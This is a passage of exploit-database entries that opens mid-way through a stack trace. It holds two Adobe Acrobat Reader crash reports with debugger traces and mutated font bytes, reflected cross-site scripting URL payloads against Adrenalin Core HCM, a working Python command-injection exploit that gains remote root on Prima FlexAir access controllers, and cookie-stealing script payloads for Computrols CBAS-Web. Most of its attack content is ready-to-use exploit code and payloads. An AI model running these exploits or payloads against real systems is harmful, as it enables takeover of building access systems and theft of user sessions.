07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba
08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068
09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6
0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481
0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997
0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223
11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37
12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321
13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e
14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7
15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e
16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2
17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215
19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc
1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802
1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a
1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b
22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50
26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d
27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be
28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10
29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d
2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775
2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181
2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d
2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24
31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f
32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47609.zip
-
Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12234
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.

# URL
# ====================
https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155

Parameter
====================
strAction

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12234
https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html

Discoverer
====================
Rishu Ranjan
-
Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(5708.4564): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006
eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210293
CoolType!CTCleanup+0x25be8:
15e440e8 f6403860        test    byte ptr [eax+38h],60h     ds:002b:c0c0c0f8=??
0:000> u @$scopeip-9
CoolType!CTCleanup+0x25bdf:
15e440df 8b4d08          mov     ecx,dword ptr [ebp+8]
15e440e2 8b7dc4          mov     edi,dword ptr [ebp-3Ch]
15e440e5 8b0481          mov     eax,dword ptr [ecx+eax*4]
15e440e8 f6403860        test    byte ptr [eax+38h],60h
15e440ec 0f851f010000    jne     CoolType!CTCleanup+0x25d11 (15e44211)
15e440f2 0fb7781a        movzx   edi,word ptr [eax+1Ah]
15e440f6 0fb7401e        movzx   eax,word ptr [eax+1Eh]
15e440fa 8bc8            mov     ecx,eax
0:000> dd ecx
6826e380  16063e80 16063e40 1605fd00 c0c0c0c0
6826e390  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3a0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3b0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3c0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3d0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3e0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3f0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8
01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea
02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02
03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1
04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd
05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1
06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa
07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe
08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd
09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0
0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27
0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4
0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e
0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59
0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2
0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18
10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0
11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a
12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70
13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc
14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f
15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e
16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df
17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb
18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d
19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554
1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d
1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314
1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426
1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0
1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2
1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883
20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717
21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d
22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2
23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d
24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e
25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a
26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215
28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc
2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802
2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a
2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b
31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3
34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50
35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d
36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be
37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10
38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d
39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775
3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181
3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d
3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24
40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f
41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph.

Original code:

--- cut ---
[...]
  cntrmask 00011100
  cntrmask 00000110
  32 hmoveto
  660 hlineto
  120 0 32 -22 15 -146 rrcurveto
  28 0 -13 203 -2 0 rlineto
[...]
--- cut ---

Mutated code:

--- cut ---
[...]
  cntrmask 11111111
  1707.08974 -99 hlineto
  120 0 32 -22 15 -146 rrcurveto
  28 0 -13 203 endchar
  0 rlineto
[...]
--- cut ---

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47610.zip
-
Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12650
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.

URL
====================
https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined

Parameter
====================
prntDDLCntrlName
prntFrmName

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12650
https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html

Discoverer
====================
Rishu Ranjan
-
Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.primasystems.eu/
# Software Link: https://primasystems.eu/flexair-access-control/
# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
############################################################################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
############################################################################
#

import requests
import sys

if len(sys.argv) < 4:
    print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
    print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n'
    sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Very important!
           "User-Agent" : "Dj/Ole",
           "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
           "Accept" : "text/html, */*; q=0.01",
           "Session-Pc" : "2",
           "X-Requested-With" : "XMLHttpRequest",
           "Accept-Encoding" : "gzip, deflate",
           "Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name=\"SetNTPServer\">"
           "<param name=\"Server\" value=\"2.europe.p"
           "ool.ntp.org;"+commando+">/www/pages/ap"
           "p/images/logos/stage.txt|\"/></request></"
           "requests>")

requests.post(url, headers=headers, data=payload)
e = requests.get(host+"/app/images/logos/stage.txt")
print e.text
-
Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10846
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1